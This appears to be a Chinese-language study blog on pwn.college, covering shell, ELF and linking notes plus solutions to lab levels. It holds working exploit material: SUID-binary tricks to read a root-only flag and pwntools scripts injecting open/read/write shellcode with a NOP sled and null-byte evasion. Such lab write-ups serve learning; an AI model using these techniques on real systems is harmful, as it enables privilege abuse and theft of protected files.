不可视境界线最后变动于：2023年4月6日下午

连接

1	`ssh -i ~/pwn.college/pwnkey hacker@dojo.pwn.college`

传文件到dojo或拉取

1 2	`scp -i ~/pwn.college/pwnkey [文件] hacker@dojo.pwn.college: scp -i ~/pwn.college/pwnkey hacker@dojo.pwn.college:[文件] ./`

可以创建flag的符号链接, 不过除了$HOME其他目录均不能写, 只能在~/下.

module 1-communication

The file system

ln -s /old/path /new/path
<in_file:      redirect in_file into the command's input
>out_file:     redirect the command's output into out_file, overwriting it
>>out_file:    redirect the command's output into out_file, appending to it
2>error_file:  redirect the command's errors into error_file, overwriting it
2>>error_file: redirect the command's errors into error_file, appending to it

Binary files

教程还是挺绝的, slide可以做为基础知识的详细参考资料. Binaryfiles的slide在这里

ELF base struct: header-sections-segments
symbols
relocations
dynamic-linking

ELF is a binary file format.
Contains the program and its data.Describes how the program should be loaded (program/segment headers).Contains metadata describing program components (section headers).
sections gather all needed information to link a given object file and build an executable,
while Program Headers split the executable into segments with different attributes, which will eventually be loaded into memory.
Section headers are not a necessary part of the ELF. Section headers are just metadata.

1
2

$ file /bin/cat 
/bin/cat: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e6afa43e1e280bd06c018f541c7ae46a2ebda83c, for GNU/Linux 3.2.0, stripped

Several ways to dig in: 在CSAPP里, 当初看的时候被我忽略掉了…
- gcc to make your ELF.
- readelf to parse the ELF header.
- objdump to parse the ELF header and disassemble the source code.
- nm to view your ELF’s symbols.
- patchelf to change some ELF properties.
- objcopy to swap out ELF sections.
- strip to remove otherwise-helpful information (such as symbols).
- kaitai struct to look through your ELF interactively

ELF base struct

ELF files are composed of three major components:

ELF Header : contains general information about the binary readelf -h <executable>
Sections : comprise all information needed for linking a target object file in order to build a working executable readelf -S <executable>
Segments : break down the structure of an ELF binary into suitable chunks to prepare the executable to be loaded into memory

每个section的意义还是要注意一下, 我又倒回来看.got.plt了

注意segment在链接的时候没有作用, section在运行时没有作用.

一方面Segment通过把section分组来提高装载的效率, 另一方面要注意必须和物理页大小对齐, 以便于pte中的权限控制.

Symbols

Provide interface to Linkers and Debuggers to enforce their functionality.

.dynstr是.dynsym的string table, The section .strtab is the String Table of .symtab Symbol Table. 而且string table的entry数量和symbol table的entry数量一致.

relocation

Defining Relocations

There are different types of relocatable files:

Generic object files (*.o). 比较简单, 就是一个静态链接的文件.
Kernel object files (*.ko). wait for future
Shared object files (*.so).
- These type of relocatable files support being linked on runtime, and they may be shared across different processes. Consequently, relocations of dynamic dependencies have to be done at runtime. This process is known as Dynamic Linking.

Elfxx_Rel and Elfxx_Rela差在一个Addend上, 也就是要重定位的位置和下一条指令地址的差值取反.

其他的部分看原博客就行, 东西太多必须每一段意思都要懂, 不过重定位条目比较少也容易记住.

Dynamic Linking

Overview

Unlike in static linking, ld requires shared libraries to create a dynamically linked executable.
The output file will contain the executable’s code and the names of the shared libraries required.

When the binary is executed, the dynamic linker will find the required dependencies to load and link them together.

Process

The dynamic linking process begins immediately after execution.

With dynamically linked programs, the system executes the file’s “interpreter”, which is an intermediate program that should set up the environment and only then execute the main binary. The interpreter lies in the PT_INTERP segment created by the compile-time linker (ld).

The dynamic linker will set up the environment using dynamic entries from the .dynamic section:

preparing the environment:

Load the original file’s PT_LOAD segments in memory.
Use the .dynamic section/segment to read dependencies, search for them on disk and load them in memory as well. This is done recursively for dependent libraries—they can be dynamically linked as well. The dependency searching algorithm is outlined in the ld.so man page.
Perform relocations – shared libraries are loaded into non-deterministic addresses and must have absolute addresses patched, as well as resolving references to other object files.
Invoke shared library initialization functions (registered in the .preinit_array, .init, .init_array sections). What happened?
Finally, pass control back to the original binary’s entry point, making it seem to the binary that control was passed directly from exec.

还讲到了LD_PRELOAD和LD_LIBRARY_PATH变量…还是看原文吧…

Lazy Linking

lazy linking的原因是如果一个程序开头出错了马上退出, rendering useless all of the relocation work performed by the dynamic linker, 所以将一些链接工作放到实际调用的时候.

在CSAPP中看过了, 基本相同, 不同在于提供了IDA的视图看法.

Process Loading

A process is created.

by fork() or clone() and execve().
Cat is loaded.
- must be executable
  
  To figure out what to load, the Linux kernel reads the beginning of the file (i.e., /bin/cat), and makes a decision:
- If the file starts with #!, the kernel extracts the interpreter from the rest of that line and executes this interpreter with the original file as an argument.
- If the file matches a format in /proc/sys/fs/binfmt_misc, the kernel executes the interpreter specified for that format with the original file as an argument.
- If the file is a dynamically-linked ELF, the kernel reads the interpreter/loader defined in the ELF, loads the interpreter and the original file, and lets the interpreter take control.
- If the file is a statically-linked ELF, the kernel will load it.Other legacy file formats are checked for
  
  notice the interpreter specified in .interp section.
  
  Dynamically linked ELFs: the loading process
- The program and its interpreter are loaded by the kernel.
- The interpreter locates the libraries.
  a. LD_PRELOAD environment variable, and anything in /etc/ld.so.preload
  b. LD_LIBRARY_PATH environment variable (can be set in the shell)
  c. DT_RUNPATH or DT_RPATH specified in the binary file (both can be modified with patchelf)
  d.system-wide configuration (/etc/ld.so.conf)
  e. /lib and /usr/lib
- The interpreter loads the libraries.
  a. these libraries can depend on other libraries, causing more to be loadedb.relocations updated
Cat is initialized.

/proc/self/maps and attribute((constructor))

Process Execution

用命令行演示了非常多的内容, 基本都没见过我尽量记录下一些细节. 谷歌文档

Cat is launched.
Cat reads its arguments and environment.
Cat does its thing.
Cat terminates.

上面四个是这一部分要考虑的流程, 我也按流程走:

Cat is launched

__libc_start_main(), 又是这个函数, 不过在这之前还有一个_start(), 形成_start()->__libc_start_main()->main()流程.

可以指定一下LD_PRELOAD参数来改变__libc_start_main()之类的操作

Cat reads arg & env

在下一节中有介绍, 视频里示范了一个改环境变量的例子.

在执行ls指令的时候添加LANG = C环境变量, 会导致排序按照ASCII码, 否则会按照系统默认的en_US-UTF-8

Cat does thing

讲到了库函数, 系统调用, 信号, 共享内存.

通过nm指令来查看symbol, strace的使用, 以及libc库函数可以不用写头文件, 不过会引起一个隐式声明警告, 可以通过man来查看需要引用什么头文件.

信号演示的时候用了ps pgrep两个指令, 看ps的manual知道了参数有三种风格. 共享内存演示了/dev/shm, 还不知道这怎么用

还有一个进程terminate, 和我在操作系统中看到的一致, 不重复了.

剩下的在PPT里.

命令行参数和环境变量

1	`int main(int argc, char argv, char envp)`

main函数的参数, 其中argv和envp是字符串数组的指针, 所以是二重指针, 两个数组的最后一个元素是null.

就像这样子:

$ gcc -o test test.c
$ ./test testing
The number of arguments is: 2

First arg:     The program name is: ./test
Second arg: The first argument is: testing

The first environment variable is: PWD=/home/yans # process working directory
The second environment variable is: SHLVL=1

env runs a command with a modified environment. 也可以设置特定的环境变量.

1 2	`$ env -i ./countenv There are 0 environment variables.`

PIPE

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

struct subprocess {
    int pid;
    int stdin;
    int stdout;
    int stderr;
};
void __close(int fd) {
    if (close(fd) == -1) { perror("Could not close pipe end" ); exit(1); }
}
void mk_pipe(int fds[2]) {
    if (pipe(fds) == -1) { perror("Could not create pipe"); exit(1); }
}
void mv_fd(int fd1, int fd2) {
    if (dup2(fd1,  fd2) == -1) { perror("Could not duplicate pipe end"); exit(1); }
    __close(fd1);
}

// Start program at argv[0] with arguments argv.
// Set up new stdin, stdout and stderr.
// Puts references to new process and pipes into `p`.
void call(char* argv[], struct subprocess * p) {
    int child_in[2]; int child_out[2]; int child_err[2];
    pipe(child_in); pipe(child_out); pipe(child_err);
    int pid = fork();
    if (pid == 0) {
        __close(0); __close(1); __close(2);                                 // __close parent pipes
        __close(child_in[1]); __close(child_out[0]); __close(child_err[0]); // unused child pipe ends
        mv_fd(child_in[0], 0); mv_fd(child_out[1], 1); mv_fd(child_err[1], 2);
        char* envp[] = { "\0" };
        //write(1,"what the fuck", 30);
        int r=execve("/challenge/embryoio_level40", NULL, NULL);
        write(1,"failure in exec", 30) ;
        exit(0);
    } else {
        __close(child_in[0]); __close(child_out[1]); __close(child_err[1]); // unused child pipe ends
        p->pid = pid;
        p->stdin = child_in[1];   // parent wants to write to subprocess child_in
        p->stdout = child_out[0]; // parent wants to read from subprocess child_out
        p->stderr = child_err[0]; // parent wants to read from subprocess child_err
    }
}

int main(void) {
    printf("Hello from parent process!\n");
    struct subprocess proc;
    char* argv[] = {"/challenge/embryoio_level40", "\0"};
    call(argv, &proc);
//    mv_fd(STDIN_FILENO, proc.stdin);
//    mv_fd(STDOUT_FILENO, proc.stdout);
    char buf[2048];
    char buf_[2048];
    read(proc.stdout, buf, 2048);
    read(proc.stderr, buf_,2048);
    printf("%s\n", buf);
    printf("%s\n", buf_);
    waitpid(proc.pid);

    return 0;
}

参考文档

真的是相当多, 见这里

有个pwntools-cheatsheet比较特别, 应该能用上

WP

怎么会有一百多个, 也太离谱了

基本连接方式: ssh

1
2
3

ssh-keygen -f pwnkey
cat pwnkey.pub #copy public key
ssh -i pwnkey hacker@dojo.pwn.college -v

在/challenge/[对应文件]中, 直接执行即可

从远程机器复制文件:

1	`scp -i pwnkey hacker@dojo.pwn.college:/challenge/checker.py ./`

level(几来着)

要求以0个环境变量运行程序, 可以使用execve函数, env命令, exec命令三种方法

其余的大概就是加环境变量, 加参数, 写在脚本里之类的简单题

level15新东西

新的一个东西: ipython, An enhenced interactive python, 增加了一些特别的功能, 还有个说明书放在本level的末尾.

ssh接上后, 进入ipython, 然后Ctrl+O就可以编辑多行脚本了, 使用的还是pwntools, 算是熟悉一点.

有两种方法:

!exec /challenge/embryoio_level15
用pwn.process()

Python – An enhanced Interactive Python

IPython offers a fully compatible replacement for the standard Python
interpreter, with convenient shell features, special commands, command
history mechanism and output results caching.

At your system command line, type ‘ipython -h’ to see the command line
options available. This document only describes interactive features.

GETTING HELP

Within IPython you have various way to access help:

? -> Introduction and overview of IPython’s features (this screen).
object? -> Details about ‘object’.
object?? -> More detailed, verbose information about ‘object’.
%quickref -> Quick reference of all IPython specific syntax and magics.
help -> Access Python’s own help system.

If you are in terminal IPython you can quit this screen by pressing q.

MAIN FEATURES

Access to the standard Python help with object docstrings and the Python
manuals. Simply type ‘help’ (no quotes) to invoke it.
Magic commands: type %magic for information on the magic subsystem.
System command aliases, via the %alias command or the configuration file(s).
Dynamic object information:

Typing ?word or word? prints detailed information about an object. Certain
long strings (code, etc.) get snipped in the center for brevity.

Typing ??word or word?? gives access to the full information without
snipping long strings. Strings that are longer than the screen are printed
through the less pager.

The ?/?? system gives access to the full source code for any object (if
available), shows function prototypes and other useful information.

If you just want to see an object’s docstring, type ‘%pdoc object’ (without
quotes, and without % if you have automagic on).
Tab completion in the local namespace:

At any time, hitting tab will complete any available python commands or
variable names, and show you a list of the possible completions if there’s
no unambiguous one. It will also complete filenames in the current directory.
Search previous command history in multiple ways:
- Start typing, and then use arrow keys up/down or (Ctrl-p/Ctrl-n) to search
  through the history items that match what you’ve typed so far.
- Hit Ctrl-r: opens a search prompt. Begin typing and the system searches
  your history for lines that match what you’ve typed so far, completing as
  much as it can.
- %hist: search history by index.
Persistent command history across sessions.
Logging of input with the ability to save and restore a working session.
System shell with !. Typing !ls will run ‘ls’ in the current directory.
The reload command does a ‘deep’ reload of a module: changes made to the
module since you imported will actually be available without having to exit.
Verbose and colored exception traceback printouts. See the magic xmode and
xcolor functions for details (just type %magic).
Input caching system:

IPython offers numbered prompts (In/Out) with input and output caching. All
input is saved and can be retrieved as variables (besides the usual arrow
key recall).

The following GLOBAL variables always exist (so don’t overwrite them!):
_i: stores previous input.
_ii: next previous.
_iii: next-next previous.
_ih : a list of all input _ih[n] is the input from line n.

Additionally, global variables named _i<n> are dynamically created (<n>
being the prompt counter), such that _i<n> == _ih[<n>]

For example, what you typed at prompt 14 is available as _i14 and _ih[14].

You can create macros which contain multiple input lines from this history,
for later re-execution, with the %macro function.

The history function %hist allows you to see any part of your input history
by printing a range of the _i variables. Note that inputs which contain
magic functions (%) appear in the history with a prepended comment. This is
because they aren’t really valid Python code, so you can’t exec them.
Output caching system:

For output that is returned from actions, a system similar to the input
cache exists but using _ instead of _i. Only actions that produce a result
(NOT assignments, for example) are cached. If you are familiar with
Mathematica, IPython’s _ variables behave exactly like Mathematica’s %
variables.

The following GLOBAL variables always exist (so don’t overwrite them!):
_ (one underscore): previous output.
__ (two underscores): next previous.
___ (three underscores): next-next previous.

Global variables named _ are dynamically created ( being the prompt
counter), such that the result of output is always available as _.

Finally, a global dictionary named _oh exists with entries for all lines
which generated output.
Directory history:

Your history of visited directories is kept in the global list _dh, and the
magic %cd command can be used to go to any entry in that list.
Auto-parentheses and auto-quotes (adapted from Nathan Gray’s LazyPython)
1. Auto-parentheses
  
  Callable objects (i.e. functions, methods, etc) can be invoked like
  this (notice the commas between the arguments)::
```
 In [1]: callable_ob arg1, arg2, arg3
```
  and the input will be translated to this::
```
 callable_ob(arg1, arg2, arg3)
```
  This feature is off by default (in rare cases it can produce
  undesirable side-effects), but you can activate it at the command-line
  by starting IPython with --autocall 1, set it permanently in your
  configuration file, or turn on at runtime with %autocall 1.
  
  You can force auto-parentheses by using ‘/‘ as the first character
  of a line. For example::
```
  In [1]: /globals             # becomes 'globals()'
```
  Note that the ‘/‘ MUST be the first character on the line! This
  won’t work::
```
  In [2]: print /globals    # syntax error
```
  In most cases the automatic algorithm should work, so you should
  rarely need to explicitly invoke /. One notable exception is if you
  are trying to call a function with a list of tuples as arguments (the
  parenthesis will confuse IPython)::
```
  In [1]: zip (1,2,3),(4,5,6)  # won't work
```
  but this will work::
```
 In [2]: /zip (1,2,3),(4,5,6)
 ------> zip ((1,2,3),(4,5,6))
 Out[2]= [(1, 4), (2, 5), (3, 6)]
```
  IPython tells you that it has altered your command line by
  displaying the new command line preceded by –>. e.g.::
```
 In [18]: callable list
 -------> callable (list)
```
2. Auto-Quoting
  
  You can force auto-quoting of a function’s arguments by using ‘,’ as
  the first character of a line. For example::
```
  In [1]: ,my_function /home/me   # becomes my_function("/home/me")
```
  If you use ‘;’ instead, the whole argument is quoted as a single
  string (while ‘,’ splits on whitespace)::
```
  In [2]: ,my_function a b c   # becomes my_function("a","b","c")
  In [3]: ;my_function a b c   # becomes my_function("a b c")
```
  Note that the ‘,’ MUST be the first character on the line! This
  won’t work::
```
  In [4]: x = ,my_function /home/me    # syntax error
```

level16

从这题开始使用这个脚本, glob可根据 Unix 终端所用规则找出所有匹配特定模式的路径名

import glob 
import pwn 
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=pwn.PIPE, stdin=pwn.PIPE) 
p.sendline("password")    # 要加这一个
print(p.read().decode())

level17

这题检查参数argv[1]. 要注意的是pwntools的process方法以前我都是直接使用process(“file/path”), 实际上是写到了argv[]的第0个位置, 如果executable(Path to the binary to execute)为None, pwntools则会使用argv[0], 这就是为什么往参数里写路径就可以执行的原因.

写成这样即可:

import glob 
import pwn 
p= pwn.process(glob.glob("/challenge/embryo*")+["gdncphvdkz"] , stdout=pwn.PIPE, stdin=pwn.PIPE) 

print(p.read().decode())

level18-21

18: 是环境变量, 在process的参数里加个env={“balabala”=“blabla”}就可以了.
19: 是重定向stdin.

import glob
import pwn
with open("/tmp/rmxgbo", "w") as o:
    o.write("kmtxemmo\n")
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=pwn.PIPE, stdin=open("/tmp/rmxgbo"))

print(p.read().decode())

有一个问题: 上面的代码应该都是正确的, 但是只有再补充一句p.interactive()的时候最后两行flag才显示出来, 原因暂未知晓

1
2
3

import glob
import pwn
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=open("/tmp/tkpich", "w"), stdin=pwn.PIPE)

21
需要清空环境变量.
注意到process这个函数中的env默认会继承python的环境变量就可以了, 必须手动清空

import glob,pwn
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=pwn.PIPE, stdin=pwn.PIPE, env={})

print(p.read().decode())

level 22-28

22: 这部分是使用命令行执行python来执行程序的, 比较简单.

1
2
3

import glob,pwn
p= pwn.process(glob.glob("/challenge/embryo*"))
p.interactive()

23-28: 重复一遍上面的工作, 比如0 environment, redirect stdin and out, 等等这些.

level 29-34

从这个开始就要编译C程序了, 29写下面这一段, 30输入一个密码.

值得注意的是, 如果直接调用execve, 那么会导致bash在执行.

如果没有waitpid, 那么子进程会被/docker/init(在我的ubuntu20.04上是/sbin/init)接管.

int pwncollege(){return 0;}
int main(int argc, char* argv[], char** envp)
{
    int pid = fork();
    if(pid == 0){//child process
        int r=execve("/challenge/embryoio_level30", argv, envp);
        printf("%d\n", r);
    }else{
        waitpid(pid);
    }
    printf("Parent process termianted.\n");

}

31: 真的绝了, “a”原本写的是””, 父进程都不对, 过了一会儿重新编译又好了, 莫名其妙.

#include <unistd.h>
int pwncollege(){return 0;}
int main(int argc, char** argv, char** envp)
{
    int pid = fork();

    if(pid == 0){//child process
        //int r=execve("/challenge/embryoio_level31", argv, envp);
        int r = execl("/challenge/embryoio_level31", "", "lndhvgwxjx", NULL);
        printf("%d\n", r);
    }else{
        waitpid(pid);
    }
    printf("Parent process termianted.\n");

}

32: 直接修改envp好像会出问题, 原因未知.

#include <unistd.h>
int pwncollege(){return 0;}
int main(int argc, char** argv, char** envp)
{
    int pid = fork();
    char* argvs[3];
    argvs[1]="jxdefy=fbilpksemj";    //暂且先手动设置吧
    argvs[2]=NULL;
    argvs[0]="sldkfj";
    if(pid == 0){//child process
        int r = execle("/challenge/embryoio_level32", "a", "lndhvgwxjx", NULL, argvs);
        printf("%d\n", r);
    }else{
        waitpid(pid);
    }
    printf("Parent process termianted.\n");

}

33: 这个就是c语言版本的重定位, 还附带父进程检查的那种. 考虑到execve系列函数会直接继承原来进程的大部分属性, 比如输入输出流, 所以直接对c程序重定向即可, 子进程直接继承.
34: 输出重定向.

level35-

35: 用脚本运行, 可以不需要fork, 直接execve
36: 输出要是到cat的PIPE, 直接在命令行里输入: ./c | cat即可
37: ./c | grep -E "*" 结束
38: ./c | sed "="
39: ./c | rev | rev
40: 使用管道重定向stdin, 去看了下c中的PIPE操作.暂时没有发现怎么用在这道题目上.

~~直接来一手三重套娃, 这样子cat就不会马上终止了~~. md不用也可以, 是我想复杂了.

1	`./cat \| cat \| /challenge/embryoio_level40`

//cat.
int main(int argc, char **argv)
{
    char buf[1024];
    int n;
    int fd = argc == 1 ? 0 : open(argv[1],0);
    while ((n = read(fd,buf,1024)) > 0 && write(1,buf,n) > 0);
}

41: 重定向stdout. 一样做法.
42: bash x.sh | cat
43: grep
44: sed
45: rev
46: 我累了

level??

import glob
import pwn
pwn.context.log_level = "DEBUG"
p2 = pwn.process([" /usr/bin/sed", "-e", "s/x/×/"])
p1 = pwn.process(glob.glob( " /chailenge/enbryo* ")，stdout=p2.stdin)
print(p2.readall())

module 2-misuse

文件权限

WP

这部分的题目就是利用被设置suid的程序来以root的权限去读文件, 无论看起来是有多么的不可能.

cat head tail rev nano emacs vim od more less sort hd(hexdump) xxd base32(64) split gzip bzip2 zip&unzip
tar ar cpio genisoimage env find make

od: od -t x8z -v -w 10 /flag 硬是拼出来.

1
2
3

0000000 6c6c6f632e6e7770 714f6f417b656765 685834544b387868 4e354550757a575a  >pwn.college{AoOqhx8KT4XhZWzuPE5N<
0000040 2e337a6d50723671 4d734d54557a5851 0a7d577a49314d54                   >q6rPmz3.QXzUTMsMTM1IzW}.<
0000070

hd /flag (hexdump)
xxd -c60 /flag 每行60个
base32 /flag | base32 -d
split: split file into pieces. split /flag
gzip -c /flag | gzip -cd
bzip2 有新的机制, 不过命令行参数和gzip非常接近
zip - /flag > aa and thencat aa or unzip -p aa
tar cf flag.tar flag then tar -xOf flag.tar 研究了半天tar的参数, main operation那几个参数每次必须加上. f参数后紧跟文件名
ar c flag.ar flag then cat flag.ar 发现经过root用户创建完archive之后直接就对其他用户可读了…更简单了
(23- ) cpio genisoimage: ???
- echo "/flag" | cpio -ov > ~/flag.cpio then cat flag.cpio 不是直接将/flag放到cpio的stdin中……他只要name-list……
env也行?太神奇了. env cat /flag
find /flag -maxdepth 0 -exec cat '{}' \;

module 3-asm

就是汇编代码的写

3 简单乘法

要注意mul指令默认被乘数放在rax里面, 乘数由我们指定, 结果是拼接而成的: RDX:RAX

import sys
from pwn import * 
from glob import *
context.log_level = 'debug'
context.arch = 'amd64'
p = process(glob("/challenge/e*"))

shellcode="""
mov rax, rdi
mov rcx, rdx
mul rsi
add rax, rcx

"""
p.send(asm(shellcode))
p.interactive()

4-5 除法

被除数放在RAX, 除数待定, 结果放在 RAX, 余数放在RDX

shellcode="""
mov rax, rdi
div rsi
mov rax, rdx
"""

6: 低位寄存器的名称

低位寄存器的名称要特别注意, rdi就是这么写错了, mov的两个操作数如果长度不匹配会报错:unsupported instruction 'mov'

Name	Notes	Type	64	32	16	8
rax	Values are returned from functions in this register.	scratch	rax	eax	ax	ah and al
rcx	Typical scratch register. Some instructions also use it as a counter.	scratch	rcx	ecx	cx	ch and cl
rdx	Scratch register.	scratch	rdx	edx	dx	dh and dl
rbx	Preserved register: don’t use it without saving it!	preserved	rbx	ebx	bx	bh and bl
rsp	The stack pointer. Points to the top of the stack (details coming soon!)	preserved	rsp	esp	sp	spl
rbp	Preserved register.	preserved	rbp	ebp	bp	bpl
rsi	Scratch register. Function argument #2 in 64-bit Linux	scratch	rsi	esi	si	sil
rdi	Scratch register. Function argument #1 in 64-bit Linux	scratch	rdi	edi	di	dil
r8	Scratch register. These were added in 64-bit mode	scratch	r8	r8d	r8w	r8b
r9	Scratch register.	scratch	r9	r9d	r9w	r9b
r10	Scratch register.	scratch	r10	r10d	r10w	r10b
r11	Scratch register.	scratch	r11	r11d	r11w	r11b
r12	Preserved register. You can use it, but you need to save and restore it.	preserved	r12	r12d	r12w	r12b
r13	Preserved register.	preserved	r13	r13d	r13w	r13b
r14	Preserved register.	preserved	r14	r14d	r14w	r14b
r15	Preserved register.	preserved	r15	r15d	r15w	r15b

shellcode="""
mov al, dil
mov bx, si
"""

8-9 bitwise op

8.
shellcode="""
xor rax, rax
or  rax, rdi
and rax, rsi
"""

9.
shellcode="""
and rdi, 1
xor rdi, 1
xor rax, rax
or rax, rdi
"""

10. 开始内存操作

注意add没有 add mem, imm这种形式, 因为时钟周期根本不够

shellcode=""" 
mov rdx, 0x404000 
mov rcx, [rdx] 
mov rax, rcx 
add rcx, 0x1337 
mov [rdx], rcx 
"""

11.简单的rax, eax, ax, ah, al的使用.

12.要注意时钟周期的问题. 常数要先移动到寄存器

shellcode="""
mov rax, 0xdeadbeef00001337
mov rbx, 0x000000C0FFEE0000
mov [rdi], rax
mov [rsi], rbx
"""

13.利用地址偏移, 简单的.

14-16.栈相关指令. 太简单了, 都是些基础题, 过了就算了

17. 跳转

nop的数量数错了, 诶他说的是0x51 bytes from current position, 但是这指的是jmp后面一条指令的地址. 不是jmp的起始地址…..

还要注意绝对跳转只能是间接跳转(line 6)( 要和条件跳转只能是直接跳转一起记清楚 )

shellcode="""
jmp L1
(0x51 nops)
pop rdi
mov rcx, 0x403000
jmp rcx
"""

18.if-elif-else连环, 要注意的是他说[rdi]是一个双字, 可能是一个负数, 所以我第一次写的QWORD PTR就错了, 只能是DWORD PTR

shellcode="""
mov eax, [rdi+4]
mov r8d, [rdi+8]
mov r9d, [rdi+12]
cmp DWORD ptr [rdi], 0x7f454c46 #!!!!!!
jne leif
add eax, r8d
add eax, r9d
jmp done

leif:
cmp DWORD PTR[rdi], 0x00005A4D #!!!!!!                                                 
jne else
sub eax, r8d
sub eax, r9d
jmp done

else:
    mul r8d
    mul r9d

done:
"""

19.条件跳转只能是直接跳转

shellcode="""
    cmp rdi, 4
    jl AAA
    mov rdi, 4
AAA:
    mov rax, rdi
    mov rbx, 8
    mul rbx
    mov ebx, DWORD PTR [rax+rsi]
    jmp rbx
"""

20.折腾了半天, 发现题目描述有错的地方, 这里明明是DWORD, 说成quad word.

还有一点被我忽略了, 如果按照add eax, ebx的做法, 那么超出四字节的部分会被舍弃

这里我想到的做法是用eax取出双字数据, 然后用rax做加法.

shellcode="""
jmp test
loop:
    mov eax, [rdi+rbx*4]    #在这里
    add rcx, rax
    inc rbx
test:
    cmp rbx, rsi
    jne loop

mov rax, rcx
div rsi
"""

21.硬是没有简化成

shellcode="""
test rdi, rdi                                                                                                                                                                                 
jz done
jmp test
loop:
    inc rdi
    inc rax
test:
    mov cl, [rdi]
    test rcx, rcx
    jne loop

done:
"""

22.调用

又是折腾了半天, 主要是逐字节比较的, 从题干也看不出来啊, 孤零零的[src_addr]真就指一个BYTE

shellcode="""
xor rax, rax
mov r12, 0x403000
mov rdx, rdi    ; tmp store rdi

test rdx, rdx
jz done

test:
mov rsi, [rdx]
test sil, sil    ;fetched from memory and then comparized bitwise
jz done

loop:
cmp sil, 90
jg if
mov r13, rax    ;preparation for call foo at 0x403000
mov dil, [rdx]
call r12
mov [rdx], al
mov rax, r13
inc rax

if:
inc rdx
jmp test

done:
ret
"""

23.偷懒, 用了别人的代码, 复习操作系统去了

;source code:
most_common_byte(src_addr, size):
    b = 0
    i = 0
    for i <= size-1:
        curr_byte = [src_addr + i]
        [stack_base - curr_byte] += 1
    b = 0

    max_freq = 0
    max_freq_byte = 0
    for b <= 0xff:
        if [stack_base - b] > max_freq:
            max_freq = [stack_base - b]
            max_freq_byte = b

    return max_freq_byte

shellcode="""
    push rbp
    mov rbp, rsp
    sub rsp, 0x100
    mov rbx, -1
AAA:
    add rbx, 1
    cmp rbx, rsi
    je BBB
    mov cl, byte ptr [rdi+rbx]
    add BYTE ptr [rsp+rcx], 1
    jmp AAA

BBB:
    mov rbx, -1
    xor rcx, rcx
    xor rdx, rdx
CCC:
    add rbx, 1
    cmp rbx, 0x100
    je DDD
    cmp BYTE ptr [rsp+rbx], CL
    jle CCC
    mov CL, BYTE ptr [rsp+rbx]
    mov rdx, rbx
    JMP CCC

DDD:
    mov rax, rdx
    mov rsp, rbp
    pop rbp
    ret
"""

module 4-sc

基本全在PPT里面.

0.基本操作

intro:
- Buiding shellcode: just using pwntools.
- Debugging: strace or gdb
common challenge:
- forbidden bytes: such as NULL('\0'), whitespace, 'H' and so on.
- self-modifying codes in level 5.
  gcc -Wl,-N --static -nostdlib -o test test.s to make writable .text segment
- multistage shellcoding:
  read into later bytes; or read into read(0, rip, 1000) (using lea rax, [rip] get rip)
- Shellcode Mangling:
  work backwards or jump over some parts to avoid them.
- Unable to speak:
  if you can communicate one bit, then you can communicate.
  such as a exit code? maybe inefficient. or signal? or …
Remain injection points: JIT, jus-in-time, 即时.

avoid null-bytes:

mov rdi, 0 -> xor rdi, rdi
xor edi, edi //will clear rdi
mov rax, 2 -> mov al , 2
mov rsi, 100 -> xor rsi, rsi / mov si, 100
;set a byte(0x01) in the asm, then dec that address
lea rdi, [rip+0x3d] -> mov byte ptr [rip+1], '/' ;and then, the whole string: '/flag'

mov rsi, 0x1017eff3d8d4981 -->
movabs rsi, 0x101010101010101
push rsi
movabs rsi, 0x1017eff3d8d4981
xor qword ptr [rsp], rsi
pop rsi

1.开始

非常直接的一道题目, 不过我重新认识了一下shellcode, 原来amd64.open做的事情还包括防止指令序列中出现'\0', 以前用的都没有细想这个问题. 不过前两题都是用的read函数直接读取stdin直到eof, 所以不需要担心空字符的问题.~~amd64.open这个函数我都没有在文档里面查到.~~

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/b*")[1] #直接使用wildcard, 不过会匹配到c和binary, 选择第二个即可
context.binary = binary
p = process(binary) 

p.recvuntil("stack at 0x")
addr = int(p.recvline()[:-2], 16)

#打开文件, rax存储fd, 从文件中读取到内存中addr+0x100, 然后写到stdout
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

payload = asm(shellcode)
p.recv()
p.sendline(payload)
p.interactive()

测试程序直接从stdin读取bytes然后存储到数组中, 把数组指针转换成函数指针调用即可执行shellcode.

附一个asm, 了解一下原理.

movabs rax, 0x101010101010101
push rax
movabs rax, 0x1010166606d672e # 写入'flag'字符串
xor qword ptr [rsp], rax
mov rdi, rsp
xor edx, edx
xor esi, esi
push 2
pop rax
syscall    # open

mov rdi, rax
xor eax, eax
xor edx, edx
mov dh, 1
movabs rsi, 0x101010101010101
push rsi
movabs rsi, 0x1017eff3d8d4981
xor qword ptr [rsp], rsi
pop rsi
syscall # read

push 1
pop rdi
xor edx, edx
mov dh, 1
movabs rsi, 0x101010101010101
push rsi
movabs rsi, 0x1017eff3d8d4981
xor qword ptr [rsp], rsi
pop rsi
push 1
pop rax
syscall     # write to stdout

2.emmmm

This challenge will randomly skip up to 0x800 bytes in your shellcode. You better adapt to that! One way to evade this is to have your shellcode start with a long set of single-byte instructions that do nothing, such as nop, before the actual functionality of your code begins. When control flow hits any of these instructions, they will all harmlessly execute and then your real shellcode will run. This concept is called a nop sled.

1 2	`In [3]: asm('nop') Out[3]: b'\x90'`

使用右对齐, fillchar='\x90’. 即payload = asm(shellcode).rjust(0x800, ‘\90’);

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/babyshell_level[0-9]")[0]
context.binary = binary
p = process(binary)

p.recvuntil("stack at 0x")
addr = int(p.recvline()[:-2], 16)

shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

payload = asm(shellcode).rjust(0x300, b'\x90')
p.recv()
p.sendline(payload)
p.interactive()

4.造一个跳板

使用encode函数: No encoders for amd64 which can avoid b’H’

mov的一种编码第一个字节就是H, 所以没有办法.

只能使用先read再jmp的方法.

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/babyshell_level[0-9]")[0]
context.binary = binary
